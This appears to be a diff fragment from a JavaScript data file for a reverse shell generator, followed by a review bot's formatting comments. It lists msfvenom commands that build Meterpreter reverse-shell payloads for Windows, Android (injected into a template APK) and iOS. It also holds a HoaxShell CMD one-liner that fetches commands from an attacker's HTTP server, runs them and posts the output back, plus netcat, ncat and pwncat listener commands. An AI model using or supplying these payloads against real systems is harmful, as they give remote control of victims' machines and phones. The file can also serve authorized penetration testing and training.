[{
"name": "Windows Meterpreter Staged Reverse TCP (x64)",
"command": "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
@ -514,7 +515,7 @@ const msfvenomCommands = withCommandType(
"command": "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
"meta": ["msfvenom", "android", "android", "reverse"]
},
{
{
"name": "Apple iOS Meterpreter Reverse TCP Inline",
"command": "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
"meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"]
@ -533,10 +534,9 @@ const msfvenomCommands = withCommandType(
);
const hoaxShellCommands = withCommandType(
const hoaxShellCommands = withCommandType(
CommandType.HoaxShell,
[
{
[{
"name": "Windows CMD cURL",
"command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
"meta": ["windows"]
@ -594,12 +594,12 @@ const rsgData = {
listenerCommands: [
['nc', 'nc -lvnp {port}'],
['nc freebsd', 'nc -lvn {port}'],
['busybox nc', 'busybox nc -lp {port}'],
['busybox nc', 'busybox nc -lp {port}'],
['ncat', 'ncat -lvnp {port}'],
['ncat.exe', 'ncat.exe -lvnp {port}'],
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
['rustcat', 'rcat listen {port}'],
['rustcat', 'rcat listen {port}'],
['openssl', 'openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes; openssl s_server -quiet -key key.pem -cert cert.pem -port {port}'],
['pwncat', 'python3 -m pwncat -lp {port}'],
['pwncat (windows)', 'python3 -m pwncat -m windows -lp {port}'],
@ -636,4 +636,4 @@ if (typeof exports !== 'undefined') {
if (typeof window !== 'undefined') {
window.rsgData = rsgData;
window.CommandType = CommandType;
}
}
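Review bot: The commented-out "PHP Emoji" entry in the `@ -136,16 +134,16 @@` hunk is re-indented but kept as dead data, which sits oddly in a commit titled cleanup/format; either delete the block outright (version control keeps it) or, if it is intentionally parked, give it a one-line `// disabled: <reason>` comment so the next reader knows whether it may be removed. The new "Zig" entry in the `@ -384,16 +382,20 @@` hunk ends its `command` string with `\n\n`, which no other entry does and which presumably reaches the generated output as trailing blank lines; trimming it to a single `\n` keeps it consistent with its neighbours. The `reverseShellCommands` array those hunks edit starts outside the hunks, and the `withCommandType` helper whose element format the entries must follow is not visible here, so the exact expected shape of each `meta` list is inferred from the other entries rather than checked.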